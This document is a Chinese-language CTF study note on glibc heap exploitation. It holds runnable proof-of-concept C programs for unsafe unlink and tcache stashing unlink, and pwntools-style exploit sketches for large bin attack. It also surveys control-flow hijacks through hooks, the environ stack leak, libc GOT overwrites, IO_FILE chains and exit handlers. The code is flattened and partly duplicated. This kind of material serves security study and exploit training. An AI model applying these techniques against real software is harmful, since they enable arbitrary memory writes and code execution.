<assert.h>uint64_t *chunk0_ptr;int main(){ setbuf(stdout, NULL); printf("Welcome to unsafe unlink 2.0!\\n"); printf("Tested in Ubuntu 20.04 64bit.\\n"); printf("This technique can be used when you have a pointer at a known location to a region you can call unlink on.\\n"); printf("The most common scenario is a vulnerable buffer that can be overflown and has a global pointer.\\n"); int malloc_size = 0x420; //we want to be big enough not to use tcache or fastbin int header_size = 2; printf("The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary 
memory write.\\n\\n"); chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0 uint64_t *chunk1_ptr = (uint64_t*) malloc(malloc_size); //chunk1 printf("The global chunk0_ptr is at %p, pointing to %p\\n", &chunk0_ptr, chunk0_ptr); printf("The victim chunk we are going to corrupt is at %p\\n\\n", chunk1_ptr); printf("We create a fake chunk inside chunk0.\\n"); printf("We setup the size of our fake chunk so that we can bypass the check introduced in https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=d6db68e66dff25d12c3bc5641b60cbd7fb6ab44f\\n"); chunk0_ptr[1] = chunk0_ptr[-1] - 0x10; printf("We setup the 'next_free_chunk' (fd) of our fake chunk to point near to &chunk0_ptr so that P->fd->bk = P.\\n"); chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3); printf("We setup the 'previous_free_chunk' (bk) of our fake chunk to point near to &chunk0_ptr so that P->bk->fd = P.\\n"); printf("With this setup we can pass this check: (P->fd->bk != P || P->bk->fd != P) == False\\n"); chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2); printf("Fake chunk fd: %p\\n",(void*) chunk0_ptr[2]); printf("Fake chunk bk: %p\\n\\n",(void*) chunk0_ptr[3]); printf("We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\\n"); uint64_t *chunk1_hdr = chunk1_ptr - header_size; printf("We shrink the size of chunk0 (saved as 'previous_size' in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\\n"); printf("It's important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly\\n"); chunk1_hdr[0] = malloc_size; printf("If we had 'normally' freed chunk0, chunk1.previous_size would have been 0x430, however this is its new value: %p\\n",(void*)chunk1_hdr[0]); printf("We mark our fake chunk as free by setting 'previous_in_use' of chunk1 as False.\\n\\n"); chunk1_hdr[1] &= ~1; printf("Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.\\n"); printf("You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\\n\\n"); free(chunk1_ptr); printf("At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\\n"); char victim_string[8]; strcpy(victim_string,"Hello!~"); chunk0_ptr[3] = (uint64_t) victim_string; printf("chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.\\n"); printf("Original value: %s\\n",victim_string); chunk0_ptr[0] = 0x4141414142424242LL; printf("New Value: %s\\n",victim_string); // sanity check assert(*(long *)victim_string == 0x4141414142424242L);} 核心思路: 12345678910111213141516malloc(0x420) # chunk Amalloc(0x18)#And another chunk to prevent consolidatemalloc(0x410) # chunk B#This chunk should be smaller than [p1] and belong to the same large binmalloc(0x18)#And another chunk to prevent consolidatefree(0)malloc(0x438)#Allocate a chunk larger than [p1] to insert [p1] into large binfree(1)#Free the smaller of the two --> [p2]edit(0, p64(0)*3+p64(target2-0x20))#最终addr1与addr2地址中的值均被赋成了victim即chunk_B的chunk header地址最终addr1与addr2地址中的值均被赋成了victim即chunk_B的chunk header地址malloc(0x438)edit(0, p64(recover)*2) # 修复large bin attack 修复: 可以通过gdb查看未更改时chunk A的fd和bk,然后修复,免于计算 限制: 需要一次UAF 效果: 在2.30以上可以在任意地址写入一个libc地址 unsafe unlink 
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263#include <stdio.h>#include <stdlib.h>#include <string.h>#include <stdint.h>#include <assert.h>uint64_t *chunk0_ptr;int main(){ setbuf(stdout, NULL); printf("Welcome to unsafe unlink 2.0!\\n"); printf("Tested in Ubuntu 20.04 64bit.\\n"); printf("This technique can be used when you have a pointer at a known location to a region you can call unlink on.\\n"); printf("The most common scenario is a vulnerable buffer that can be overflown and has a global pointer.\\n"); int malloc_size = 0x420; //we want to be big enough not to use tcache or fastbin int header_size = 2; printf("The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.\\n\\n"); chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0 uint64_t *chunk1_ptr = (uint64_t*) malloc(malloc_size); //chunk1 printf("The global chunk0_ptr is at %p, pointing to %p\\n", &chunk0_ptr, chunk0_ptr); printf("The victim chunk we are going to corrupt is at %p\\n\\n", chunk1_ptr); printf("We create a fake chunk inside chunk0.\\n"); printf("We setup the size of our fake chunk so that we can bypass the check introduced in https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=d6db68e66dff25d12c3bc5641b60cbd7fb6ab44f\\n"); chunk0_ptr[1] = chunk0_ptr[-1] - 0x10; printf("We setup the 'next_free_chunk' (fd) of our fake chunk to point near to &chunk0_ptr so that P->fd->bk = P.\\n"); chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3); printf("We setup the 'previous_free_chunk' (bk) of our fake chunk to point near to &chunk0_ptr so that P->bk->fd = P.\\n"); printf("With this setup we can pass this check: (P->fd->bk != P || P->bk->fd != P) == False\\n"); chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2); printf("Fake chunk fd: %p\\n",(void*) chunk0_ptr[2]); printf("Fake chunk bk: %p\\n\\n",(void*) chunk0_ptr[3]); printf("We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\\n"); uint64_t *chunk1_hdr = chunk1_ptr - header_size; printf("We shrink the size of chunk0 (saved as 'previous_size' in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\\n"); printf("It's important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly\\n"); chunk1_hdr[0] = malloc_size; printf("If we had 'normally' freed chunk0, chunk1.previous_size would have been 0x430, however this is its new value: %p\\n",(void*)chunk1_hdr[0]); printf("We mark our fake chunk as free by setting 'previous_in_use' of chunk1 as False.\\n\\n"); chunk1_hdr[1] &= ~1; printf("Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.\\n"); printf("You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\\n\\n"); free(chunk1_ptr); printf("At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\\n"); char victim_string[8]; strcpy(victim_string,"Hello!~"); chunk0_ptr[3] = (uint64_t) victim_string; printf("chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.\\n"); printf("Original value: %s\\n",victim_string); chunk0_ptr[0] = 0x4141414142424242LL; printf("New Value: %s\\n",victim_string); // sanity check assert(*(long *)victim_string == 0x4141414142424242L);} 
核心思路: 123456# chunk 0 ptr store in &ptrmalloc(0x420) # not in fastbin or tcachemalloc(0x420) edit(0, p64(0)+p64(fake_size)+p64(&ptr-0x18)+p64(&ptr-0x10)+p64(0)*k + p64(fake_prev_size)+p64(size)) # fakesize = 0x420-0x10# need fake_prev_size = prev_size-0x10, sive.PREV_INUSE = 0 限制: overflow ,可以修改prev_inuse触发fake chunk unlink and consolidate 主要适用于可以知道堆指针存储基址的情况,可以控制堆管理机构 效果: 可以将ptr处地址改写为&ptr-8 tcache stashing unlink 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081#include <stdio.h>#include <stdlib.h>#include <assert.h>int main(){ unsigned long stack_var[0x10] = {0}; unsigned long *chunk_lis[0x10] = {0}; unsigned long *target; setbuf(stdout, NULL); printf("This file demonstrates the stashing unlink attack on tcache.\\n\\n"); printf("This poc has been tested on both glibc-2.27, glibc-2.29 and glibc-2.31.\\n\\n"); printf("This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\\n\\n"); printf("The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\\n\\n"); printf("This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack.\\n\\n"); // stack_var emulate the fake_chunk we want to alloc to printf("Stack_var emulates the fake chunk we want to alloc to.\\n\\n"); printf("First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\\n\\n"); stack_var[3] = (unsigned long)(&stack_var[2]); printf("You can see the value of fake_chunk->bk is:%p\\n\\n",(void*)stack_var[3]); printf("Also, let's see the initial value of stack_var[4]:%p\\n\\n",(void*)stack_var[4]); printf("Now we alloc 9 chunks with malloc.\\n\\n"); //now we malloc 9 chunks for(int i = 0;i < 9;i++){ chunk_lis[i] = (unsigned long*)malloc(0x90); } //put 7 chunks into tcache printf("Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\\n\\n"); for(int i = 3;i < 9;i++){ free(chunk_lis[i]); } printf("As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\\n\\n"); //last tcache bin free(chunk_lis[1]); //now they are put into unsorted bin free(chunk_lis[0]); free(chunk_lis[2]); //convert into small bin printf("Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\\n\\n"); malloc(0xa0);// size > 0x90 //now 5 tcache bins printf("Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\\n\\n"); malloc(0x90); malloc(0x90); printf("Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\\n\\n",(void*)stack_var); //change victim->bck /*VULNERABILITY*/ chunk_lis[2][1] = (unsigned long)stack_var; /*VULNERABILITY*/ //trigger the attack printf("Finally we alloc a 0x90 chunk with calloc to trigger the attack. 
The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\\n\\n"); calloc(1,0x90); printf("Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\\n\\n",(void*)stack_var[2],(void*)stack_var[4]); //malloc and return our fake chunk on stack target = malloc(0x90); printf("As you can see, next malloc(0x90) will return the region our fake chunk: %p\\n",(void*)target); assert(target == &stack_var[2]); return 0;} 核心思路: 123456789101112131415calloc(0xa0)for i in range(6): calloc(0xa0) free(i)calloc(0x4b0) # 9 calloc(0xb0) # 10free(9)calloc(0x400)calloc(0x4b0) # 11calloc(0xb0) # 12free(9)calloc(0x400) #13edit(13, b'\\x00'*0x400+p64(prev_size)+p64(size)+p64(target_add-0x10))calloc(0xa0) 限制: 需要UAF 主要适用于只有calloc并且可以分配tcache大小的chunk的情况,对于有malloc,打tcache poison更加方便 效果: 获得任意地址target_addr的控制权:在上述流程中,直接将chunk_A的bk改为target_addr - 0x10,并且保证target_addr - 0x10的bk的fd为一个可写地址(一般情况下,使target_addr - 0x10的bk,即target_addr + 8处的值为一个可写地址即可)。 在任意地址target_addr写入大数值:在unsorted bin attack后,有时候要修复链表,在链表不好修复时,可以采用此利用达到同样的效果,在高版本glibc下,unsorted bin attack失效后,此利用应用更为广泛。在上述流程中,需要使tcache bin中原先有六个堆块,然后将chunk_A的bk改为target_addr - 0x10即可。 tcache poison 主要是通过改写tcache的next指针,实现类似于fastbin的house of spirit的效果。 这个技术非常常用,由于tcache基本没有任何检查,如果需要任意地址分配,这是第一个考虑的技术。 house of orange house of orange 原利用链中的IO_FILE相关利用已经失效了,这里主要关注其绕过无free函数限制的方法,即通过malloc大于top chunk大小的chunk时会先释放top chunk,再拓展堆区域。 一般而言,修改top chunk需要满足一下条件。 伪造的 size 必须要对齐到内存页 size 要大于 MINSIZE(0x10) size 要小于之后申请的 chunk size + MINSIZE(0x10) size 的 prev inuse 位必须为 1 攻击面 劫持控制流 hooks stack IO_FILE dlts libc.got 辅助攻击链 tcache_perthread_struct global_max_fast heap 管理结构 劫持控制流 hooks 堆利用中最基本的夺取控制流的方法就是打各种hooks。 一般而言,可以利用__free_hook 加 写入’/bin/sh’的堆快实现劫持。 此外,如果要打one_gadget的话,可以打__malloc_hook,在tcache之前的版本,更多是打__malloc_hook,因为其在main_arena附近,存在许多libc上地址,方便通过错位构造0x7f的size,此外,由于__malloc_hook和__realloc_hook临近,也可以很方便地同时控制这两个hook,然后通过__realloc_hook配合来调整栈帧,方便满足one gadget 条件 而在glibc2.34版本及以上,各类hooks都已经被移除,因此也需要掌握一些其他的劫持控制流的办法。 stack 在stack overflow 中,通过栈和ROP劫持控制流的方法我们已经不陌生,然而不像stack overflow 天然可以在栈上写入,如果要在heap exploation中通过ROP来劫持控制流,一个无法绕过的问题是栈地址不可知。 我们都知道程序加载时,环境变量会被压入栈中,可以通过environ指针访问到栈上环境变量。 查看glibc源代码 123456#if !_LIBC# define __environ environ# ifndef HAVE_ENVIRON_DECLextern char **environ;# endif#endif 发现这是一个extern变量,在gdb中调试查找 12345678910111213141516171819202122 0x7f78a14d4000 0x7f78a1500000 r--p 2c000 0 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/libc.so.6 0x7f78a1500000 0x7f78a1668000 r-xp 168000 2c000 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/libc.so.6 0x7f78a1668000 0x7f78a16bd000 r--p 55000 194000 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/libc.so.6 0x7f78a16bd000 0x7f78a16be000 ---p 1000 1e9000 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/libc.so.6 0x7f78a16be000 0x7f78a16c1000 r--p 3000 1e9000 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/libc.so.6 0x7f78a16c1000 0x7f78a16c4000 rw-p 3000 1ec000 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/libc.so.6 0x7f78a16c4000 0x7f78a16d3000 rw-p f000 0 [anon_7f78a16c4] 0x7f78a16d3000 0x7f78a16d4000 r--p 1000 0 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/ld.so.2 0x7f78a16d4000 0x7f78a16f8000 r-xp 24000 1000 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/ld.so.2 0x7f78a16f8000 0x7f78a1702000 r--p a000 25000 
/home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/ld.so.2 0x7f78a1702000 0x7f78a1704000 r--p 2000 2e000 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/ld.so.2 0x7f78a1704000 0x7f78a1706000 rw-p 2000 30000 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/ld.so.2 0x7ffd6bb9e000 0x7ffd6bbc0000 rw-p 22000 0 [stack] 0x7ffd6bbd4000 0x7ffd6bbd8000 r--p 4000 0 [vvar] 0x7ffd6bbd8000 0x7ffd6bbda000 r-xp 2000 0 [vdso]0xffffffffff600000 0xffffffffff601000 --xp 1000 0 [vsyscall]pwndbg> p environ$1 = (char **) 0x7ffd6bbbdfc8pwndbg> p &environ$2 = (char ***) 0x7f78a16c9ec0 <environ>pwndbg> 可以看到其存在于anon_7f78a16c4段,在libc后,与libc存在固定偏移,猜测这一部分内容与ld 过程有关(笔者暂且还没有查证) 既然可以通过访问libc偏移地址leak stack地址,那么此时我们就可以通过这个栈地址分配到栈上来ROP了。 此攻击点的优点是不像IO_FILE的攻击那样,需要触发程序结束时(exit()函数,从main返回,malloc_assert)时清理现场的流程,可以覆盖堆菜单中分配函数或者edit函数的栈来实现攻击。 libc.got checksec libc,会发现其一般开启了Partial RELRO,所以可以考虑写libc的got表 1234567$ checksec libc.so.6 Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 笔者在实际操作时发现,pwntools的elf.got并不能很好解析libc的got段,可以使用IDA来查看。 以下的got表来自libc2.34 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137.got.plt:00000000001ED000 ; Segment type: Pure data.got.plt:00000000001ED000 ; Segment permissions: Read/Write.got.plt:00000000001ED000 _got_plt segment qword public 'DATA' use64.got.plt:00000000001ED000 assume cs:_got_plt.got.plt:00000000001ED000 ;org 1ED000h.got.plt:00000000001ED000 _GLOBAL_OFFSET_TABLE_ dq offset _DYNAMIC.got.plt:00000000001ED008 qword_1ED008 dq 0 ; DATA XREF: sub_2C000↑r.got.plt:00000000001ED010 qword_1ED010 dq 0 ; DATA XREF: sub_2C000+6↑r.got.plt:00000000001ED018 off_1ED018 dq offset __strnlen_ifunc.got.plt:00000000001ED018 ; DATA XREF: j___strnlen_ifunc↑r.got.plt:00000000001ED018 ; Indirect relocation.got.plt:00000000001ED020 off_1ED020 dq offset __rawmemchr_ifunc.got.plt:00000000001ED020 ; DATA XREF: j___rawmemchr_ifunc↑r.got.plt:00000000001ED020 ; Indirect relocation.got.plt:00000000001ED028 off_1ED028 dq offset __GI___libc_realloc.got.plt:00000000001ED028 ; DATA XREF: _realloc↑r.got.plt:00000000001ED030 off_1ED030 dq offset __strncasecmp_ifunc.got.plt:00000000001ED030 ; DATA XREF: j___strncasecmp_ifunc↑r.got.plt:00000000001ED030 ; Indirect relocation.got.plt:00000000001ED038 off_1ED038 dq offset _dl_exception_create.got.plt:00000000001ED038 ; DATA XREF: __dl_exception_create↑r.got.plt:00000000001ED040 off_1ED040 dq offset __mempcpy_ifunc.got.plt:00000000001ED040 ; DATA XREF: j___mempcpy_ifunc↑r.got.plt:00000000001ED040 ; Indirect relocation.got.plt:00000000001ED048 off_1ED048 dq offset __wmemset_ifunc.got.plt:00000000001ED048 ; DATA XREF: j___wmemset_ifunc↑r.got.plt:00000000001ED048 ; Indirect relocation.got.plt:00000000001ED050 off_1ED050 dq offset __libc_calloc ; DATA XREF: _calloc↑r.got.plt:00000000001ED058 off_1ED058 dq offset strspn_ifunc ; DATA XREF: j_strspn_ifunc↑r.got.plt:00000000001ED058 ; Indirect relocation.got.plt:00000000001ED060 off_1ED060 dq offset memchr_ifunc ; DATA XREF: j_memchr_ifunc↑r.got.plt:00000000001ED060 ; Indirect relocation.got.plt:00000000001ED068 off_1ED068 dq offset __libc_memmove_ifunc.got.plt:00000000001ED068 ; DATA XREF: j___libc_memmove_ifunc↑r.got.plt:00000000001ED068 ; Indirect relocation.got.plt:00000000001ED070 off_1ED070 dq offset 
__wmemchr_ifunc.got.plt:00000000001ED070 ; DATA XREF: j___wmemchr_ifunc↑r.got.plt:00000000001ED070 ; Indirect relocation.got.plt:00000000001ED078 off_1ED078 dq offset __stpcpy_ifunc.got.plt:00000000001ED078 ; DATA XREF: j___stpcpy_ifunc↑r.got.plt:00000000001ED078 ; Indirect relocation.got.plt:00000000001ED080 off_1ED080 dq offset __wmemcmp_ifunc.got.plt:00000000001ED080 ; DATA XREF: j___wmemcmp_ifunc↑r.got.plt:00000000001ED080 ; Indirect relocation.got.plt:00000000001ED088 off_1ED088 dq offset _dl_find_dso_for_object.got.plt:00000000001ED088 ; DATA XREF: __dl_find_dso_for_object↑r.got.plt:00000000001ED090 off_1ED090 dq offset strncpy_ifunc ; DATA XREF: j_strncpy_ifunc↑r.got.plt:00000000001ED090 ; Indirect relocation.got.plt:00000000001ED098 off_1ED098 dq offset strlen_ifunc ; DATA XREF: j_strlen_ifunc↑r.got.plt:00000000001ED098 ; Indirect relocation.got.plt:00000000001ED0A0 off_1ED0A0 dq offset __strcasecmp_l_ifunc.got.plt:00000000001ED0A0 ; DATA XREF: j___strcasecmp_l_ifunc↑r.got.plt:00000000001ED0A0 ; Indirect relocation.got.plt:00000000001ED0A8 off_1ED0A8 dq offset strcpy_ifunc ; DATA XREF: j_strcpy_ifunc↑r.got.plt:00000000001ED0A8 ; Indirect relocation.got.plt:00000000001ED0B0 off_1ED0B0 dq offset __wcschr_ifunc.got.plt:00000000001ED0B0 ; DATA XREF: j___wcschr_ifunc↑r.got.plt:00000000001ED0B0 ; Indirect relocation.got.plt:00000000001ED0B8 off_1ED0B8 dq offset __strchrnul_ifunc.got.plt:00000000001ED0B8 ; DATA XREF: j___strchrnul_ifunc↑r.got.plt:00000000001ED0B8 ; Indirect relocation.got.plt:00000000001ED0C0 off_1ED0C0 dq offset __memrchr_ifunc.got.plt:00000000001ED0C0 ; DATA XREF: j___memrchr_ifunc↑r.got.plt:00000000001ED0C0 ; Indirect relocation.got.plt:00000000001ED0C8 off_1ED0C8 dq offset _dl_deallocate_tls.got.plt:00000000001ED0C8 ; DATA XREF: __dl_deallocate_tls↑r.got.plt:00000000001ED0D0 off_1ED0D0 dq offset __tls_get_addr.got.plt:00000000001ED0D0 ; DATA XREF: ___tls_get_addr↑r.got.plt:00000000001ED0D8 off_1ED0D8 dq offset __wmemset_ifunc.got.plt:00000000001ED0D8 ; DATA XREF: j___wmemset_ifunc_0↑r.got.plt:00000000001ED0D8 ; Indirect relocation.got.plt:00000000001ED0E0 off_1ED0E0 dq offset memcmp_ifunc ; DATA XREF: j_memcmp_ifunc↑r.got.plt:00000000001ED0E0 ; Indirect relocation.got.plt:00000000001ED0E8 off_1ED0E8 dq offset __strncasecmp_l_ifunc.got.plt:00000000001ED0E8 ; DATA XREF: j___strncasecmp_l_ifunc↑r.got.plt:00000000001ED0E8 ; Indirect relocation.got.plt:00000000001ED0F0 off_1ED0F0 dq offset _dl_fatal_printf.got.plt:00000000001ED0F0 ; DATA XREF: __dl_fatal_printf↑r.got.plt:00000000001ED0F8 off_1ED0F8 dq offset strcat_ifunc ; DATA XREF: j_strcat_ifunc↑r.got.plt:00000000001ED0F8 ; Indirect relocation.got.plt:00000000001ED100 off_1ED100 dq offset __wcscpy_ifunc.got.plt:00000000001ED100 ; DATA XREF: j___wcscpy_ifunc↑r.got.plt:00000000001ED100 ; Indirect relocation.got.plt:00000000001ED108 off_1ED108 dq offset strcspn_ifunc ; DATA XREF: j_strcspn_ifunc↑r.got.plt:00000000001ED108 ; Indirect relocation.got.plt:00000000001ED110 off_1ED110 dq offset __strcasecmp_ifunc.got.plt:00000000001ED110 ; DATA XREF: j___strcasecmp_ifunc↑r.got.plt:00000000001ED110 ; Indirect relocation.got.plt:00000000001ED118 off_1ED118 dq offset strncmp_ifunc ; DATA XREF: j_strncmp_ifunc↑r.got.plt:00000000001ED118 ; Indirect relocation.got.plt:00000000001ED120 off_1ED120 dq offset __wmemchr_ifunc.got.plt:00000000001ED120 ; DATA XREF: j___wmemchr_ifunc_0↑r.got.plt:00000000001ED120 ; Indirect relocation.got.plt:00000000001ED128 off_1ED128 dq offset __stpncpy_ifunc.got.plt:00000000001ED128 ; DATA XREF: 
j___stpncpy_ifunc↑r.got.plt:00000000001ED128 ; Indirect relocation.got.plt:00000000001ED130 off_1ED130 dq offset __wcscmp_ifunc.got.plt:00000000001ED130 ; DATA XREF: j___wcscmp_ifunc↑r.got.plt:00000000001ED130 ; Indirect relocation.got.plt:00000000001ED138 off_1ED138 dq offset __libc_memmove_ifunc.got.plt:00000000001ED138 ; DATA XREF: j___libc_memmove_ifunc_0↑r.got.plt:00000000001ED138 ; Indirect relocation.got.plt:00000000001ED140 off_1ED140 dq offset strrchr_ifunc ; DATA XREF: j_strrchr_ifunc↑r.got.plt:00000000001ED140 ; Indirect relocation.got.plt:00000000001ED148 off_1ED148 dq offset strchr_ifunc ; DATA XREF: j_strchr_ifunc↑r.got.plt:00000000001ED148 ; Indirect relocation.got.plt:00000000001ED150 off_1ED150 dq offset __wcschr_ifunc.got.plt:00000000001ED150 ; DATA XREF: j___wcschr_ifunc_0↑r.got.plt:00000000001ED150 ; Indirect relocation.got.plt:00000000001ED158 off_1ED158 dq offset __new_memcpy_ifunc.got.plt:00000000001ED158 ; DATA XREF: j___new_memcpy_ifunc↑r.got.plt:00000000001ED158 ; Indirect relocation.got.plt:00000000001ED160 off_1ED160 dq offset _dl_rtld_di_serinfo.got.plt:00000000001ED160 ; DATA XREF: __dl_rtld_di_serinfo↑r.got.plt:00000000001ED168 off_1ED168 dq offset _dl_allocate_tls.got.plt:00000000001ED168 ; DATA XREF: __dl_allocate_tls↑r.got.plt:00000000001ED170 off_1ED170 dq offset __tunable_get_val.got.plt:00000000001ED170 ; DATA XREF: ___tunable_get_val↑r.got.plt:00000000001ED178 off_1ED178 dq offset __wcslen_ifunc.got.plt:00000000001ED178 ; DATA XREF: j___wcslen_ifunc↑r.got.plt:00000000001ED178 ; Indirect relocation.got.plt:00000000001ED180 off_1ED180 dq offset memset_ifunc ; DATA XREF: j_memset_ifunc↑r.got.plt:00000000001ED180 ; Indirect relocation.got.plt:00000000001ED188 off_1ED188 dq offset __wcsnlen_ifunc.got.plt:00000000001ED188 ; DATA XREF: j___wcsnlen_ifunc↑r.got.plt:00000000001ED188 ; Indirect relocation.got.plt:00000000001ED190 off_1ED190 dq offset strcmp_ifunc ; DATA XREF: j_strcmp_ifunc↑r.got.plt:00000000001ED190 ; Indirect relocation.got.plt:00000000001ED198 off_1ED198 dq offset _dl_allocate_tls_init.got.plt:00000000001ED198 ; DATA XREF: __dl_allocate_tls_init↑r.got.plt:00000000001ED1A0 off_1ED1A0 dq offset __nptl_change_stack_perm.got.plt:00000000001ED1A0 ; DATA XREF: ___nptl_change_stack_perm↑r.got.plt:00000000001ED1A8 off_1ED1A8 dq offset strpbrk_ifunc ; DATA XREF: j_strpbrk_ifunc↑r.got.plt:00000000001ED1A8 ; Indirect relocation.got.plt:00000000001ED1B0 off_1ED1B0 dq offset __strnlen_ifunc.got.plt:00000000001ED1B0 ; DATA XREF: j___strnlen_ifunc_0↑r.got.plt:00000000001ED1B0 _got_plt ends ; Indirect relocation 可以看到got表中包含了很多字符串和内存相关函数,包括strlen等,为什么strlen这种在libc中实现的函数会需要走got表呢? 笔者在glibc2.34的源代码中进行了查找: 12345// string/string.h/* Return the length of S. 
*/extern size_t strlen (const char *__s) __THROW __attribute_pure__ __nonnull ((1)); 123456789101112131415161718192021222324252627282930313233343536373839404142434445// /sysdeps/alpha/strlen.S// ENTRY(strlen)#ifdef PROF ldgp gp, 0(pv) lda AT, _mcount jsr AT, (AT), _mcount .prologue 1#else .prologue 0#endif ldq_u t0, 0(a0) # load first quadword (a0 may be misaligned) lda t1, -1(zero) insqh t1, a0, t1 andnot a0, 7, v0 or t1, t0, t0 nop # dual issue the next two on ev5 cmpbge zero, t0, t1 # t1 <- bitmask: bit i == 1 <==> i-th byte == 0 bne t1, $found$loop: ldq t0, 8(v0) addq v0, 8, v0 # addr += 8 cmpbge zero, t0, t1 beq t1, $loop$found: negq t1, t2 # clear all but least set bit and t1, t2, t1 and t1, 0xf0, t2 # binary search for that set bit and t1, 0xcc, t3 and t1, 0xaa, t4 cmovne t2, 4, t2 cmovne t3, 2, t3 cmovne t4, 1, t4 addq t2, t3, t2 addq v0, t4, v0 addq v0, t2, v0 nop # dual issue next two on ev4 and ev5 subq v0, a0, v0 ret END(strlen)libc_hidden_builtin_def (strlen) 发现在strings.h中,strlen是作为extern函数被引入的,然后发现其真正的实现是在其他文件中通过汇编实现的。 笔者猜测对于glibc对于strlen这种常用操作使用汇编编写来加快执行速度,也因此将其变成了extern 变量。 由于不是很了解编译过程的实现,笔者暂时还无法对此给出完美的解释,因此先在此按下不表,等待之后的深入研究。 而在ctf题中,最常劫持的got表也是strlen,因为其会在puts中被调用,很容易被用到。 同时,在house of pig的攻击流程中,可以将malloc@got作为malloc_hook的替代。 其优点在于像hooks一样劫持方便,只需要libc地址加一次任意分配即可,缺点在与其利用存在限制,并不是所有程序都会用到got表中的函数 此外,很多字符串相关函数,都会调用got表中的函数,因此可以通过此来劫持。 不过在最近的比赛中,笔者打算使用libc.got 时,发现高版本libc似乎很多libc got链用不了了。 同时@kylebot 使用angr挖掘IO_FILE链启发了我,笔者打算写一个用argn挖掘可利用的libc.got的工具 #TODO 稍微鸽一下( IO_FILE 在高版本的IO_FILE攻击主要是以下几条利用链(实际上大同小异),基本上都是通过IO_clean_up来劫持控制流 house of apple 2/house of cat: _IO_wide_data 主打一个简单方便 house of Lys 主要在于,一般而言,用largebin attack进行攻击时,IO_FILE 的头我们是控制不了的,所以house of apple2存在一些不方便的地方。 而house of Lys和house of apple2一样简单,并且不需要控制head house of kiwi: _IO_file_jumps 缺点在于_IO_file_jumps在一些版本里是不可写的,而且2.36修改了__malloc_assert house of emma: _IO_cookie_jumps 需要能控制pointer_guard 如果要找到更多的IO_FILE 链呢? 可以用angr自动化挖掘IO FILE链接 exit() exit 的流程在这篇blog中已经讲述得很详细了, 攻击点如下 __run_exit_handles中的__exit_funcs 需要绕过pointer_guard rtld_global的l_info(指向ELF的Dynamic段) 这是一个ld地址,所以和libc的地址可能会有一些不确定的偏移(和版本有关,可以开个对应版本的docker看看) 虽然Dynamic 段的结构是<idx,偏移>,但其实,l_info 的解析过程中,并不会检测其idx,所以其实只需要伪造偏移就行 通过控制l_info对应idx可以控制dl_fini的析构,主要是两种: fini_array 和 fini fini_array可以用来控制orw 